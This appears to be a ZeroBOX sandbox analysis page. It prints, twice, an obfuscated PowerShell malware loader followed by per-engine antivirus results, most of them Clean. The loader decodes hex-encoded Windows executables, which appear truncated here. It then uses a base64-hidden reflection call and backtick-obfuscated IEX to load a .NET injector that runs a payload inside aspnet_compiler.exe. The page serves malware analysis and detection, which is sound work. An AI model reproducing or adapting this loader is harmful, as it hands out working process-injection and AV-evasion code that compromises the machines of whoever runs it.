popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
FUNCTION D4FD5C5B9266824C4EEFC83E0C69FD3FAA($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE)
$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx = "Fr"+"omBa"+"se6"+"4Str"+"ing"
$D4FD5C5B9266824C4EEFC83E0C69FD3FAAG = [Text.Encoding]::Utf8.GetString([Convert]::$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE))
return $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG
Function HBar {
[CmdletBinding()]
[OutputType([byte[]])]
param(
[Parameter(Mandatory=$true)] [String]$H3
$H2 = New-Object -TypeName byte[] -ArgumentList ($H3.Length / 2)
for ($i = 0; $i -lt $H3.Length; $i += 2) {
$H2[$i / 2] = [Convert]::ToByte($H3.Substring($i, 2), 16)
return [byte[]]$H2
[String]$H4 = '4D5A9----3-------4------FFFF----B8--------------4-----------------------------------------------------------------------8--------E1FBA-E--B4-9CD21B8-14CCD21546869732-7-726F6772616D2-63616E6E6F742-62652-72756E2-696E2-444F532-6D6F64652E-D-D-A24--------------5-45----4C-1-3--A19-886-----------------E----E21-B-1-8----8A-2-----6------------DEA8-2----2-------C--2------4-----2--------2-----4---------------4-------------------3-----2-------------3--4-85----1-----1---------1-----1--------------F----------------------9-A8-2--4B--------C--2--54-3--------------------------------------E--2---C--------------------------------------------------------------------------------------------------------2------8-----------------------82-----48----------------------2E74657874------E488-2----2-------8A-2-----2----------------------------2-----6-2E72737263------54-3------C--2-----4------8C-2--------------------------4-----4-2E72656C6F63-----C--------E--2-----2------9--2--------------------------4-----42-----------------
[Byte[]]$H5=HBar $H4
[String]$Server = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103002390B75E0000000000000000E00002010B01080000B20000000A0000000000006ED000000020000000E000000000400000200000000200000400000000000000040000000000000000200100000200000000000002004085000010000010000000001000001000000000000010000000000000000000000020D000004B00000000E00000FF07000000000000000000000000000000000000000001000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000074B000000020000000B2000000020000000000000000000000000000200000602E72737263000000FF07000000E000000008000000B40000000000000000000000000000400000402E72656C6F6300000C000000000001000002000000BC0000000000000000000000000000400000420000000000000
[Byte[]]$H1=HBar $Server
$JUANADEARCO = 'W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRINSkuR2V0VHlwZSgnVkJORVQuUEUnKS5HZXRNZXRob2QoJ1J1bicpLkludm9rZSgkbnVsbCxbb2JqZWN0W11dICggJ0M6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxhc3BuZXRfY29tcGlsZXIuZXhlJywkSDEpKQ=='
$REYKI = D4FD5C5B9266824C4EEFC83E0C69FD3FAA($JUANADEARCO);$Run=($REYKI -Join '')|I`E`X
start-sleep -s 7
FUNCTION D4FD5C5B9266824C4EEFC83E0C69FD3FAA($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE)
$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx = "Fr"+"omBa"+"se6"+"4Str"+"ing"
$D4FD5C5B9266824C4EEFC83E0C69FD3FAAG = [Text.Encoding]::Utf8.GetString([Convert]::$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE))
return $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG
Function HBar {
[CmdletBinding()]
[OutputType([byte[]])]
param(
[Parameter(Mandatory=$true)] [String]$H3
$H2 = New-Object -TypeName byte[] -ArgumentList ($H3.Length / 2)
for ($i = 0; $i -lt $H3.Length; $i += 2) {
$H2[$i / 2] = [Convert]::ToByte($H3.Substring($i, 2), 16)
return [byte[]]$H2
[String]$H4 = '4D5A9----3-------4------FFFF----B8--------------4-----------------------------------------------------------------------8--------E1FBA-E--B4-9CD21B8-14CCD21546869732-7-726F6772616D2-63616E6E6F742-62652-72756E2-696E2-444F532-6D6F64652E-D-D-A24--------------5-45----4C-1-3--A19-886-----------------E----E21-B-1-8----8A-2-----6------------DEA8-2----2-------C--2------4-----2--------2-----4---------------4-------------------3-----2-------------3--4-85----1-----1---------1-----1--------------F----------------------9-A8-2--4B--------C--2--54-3--------------------------------------E--2---C--------------------------------------------------------------------------------------------------------2------8-----------------------82-----48----------------------2E74657874------E488-2----2-------8A-2-----2----------------------------2-----6-2E72737263------54-3------C--2-----4------8C-2--------------------------4-----4-2E72656C6F63-----C--------E--2-----2------9--2--------------------------4-----42-----------------
[Byte[]]$H5=HBar $H4
[String]$Server = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000080100000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000DA171B0D9E76755E9E76755E9E76755ED355685E9F76755ECD556C5E9C76755E9E76755E9276755EE56A795E9F76755E1D6A7B5E9D76755E76697F5E9576755E7669715E9A76755EFC69665E9176755E9E76745EAE77755E2670735E9F76755E76697E5E8976755E526963689E76755E000000000000000000000000000000000000000000000000504500004C01040075A36E580000000000000000E0000F010B01060000F00000007000000000000088FD0000001000000000010000004000001000000010000004000000000000000400000000000000007001000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000F01B01001801000000600100380F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000005000000000000000000000000000000000
[Byte[]]$H1=HBar $Server
$JUANADEARCO = 'W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRINSkuR2V0VHlwZSgnVkJORVQuUEUnKS5HZXRNZXRob2QoJ1J1bicpLkludm9rZSgkbnVsbCxbb2JqZWN0W11dICggJ0M6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxhc3BuZXRfY29tcGlsZXIuZXhlJywkSDEpKQ=='
$REYKI = D4FD5C5B9266824C4EEFC83E0C69FD3FAA($JUANADEARCO);$Run=($REYKI -Join '')|I`E`X
Antivirus Signature
Bkav Clean
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
AegisLab Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec W32.Spyrat
ESET-NOD32 PowerShell/Agent.TI
Baidu Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Tencent Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Emsisoft Clean
Ikarus Trojan.JS.Crypt
GData Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
AhnLab-V3 Clean
VBA32 Clean
ALYac Clean
MAX Clean
Zoner Clean
Rising Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
Qihoo-360 Clean
No IRMA results available.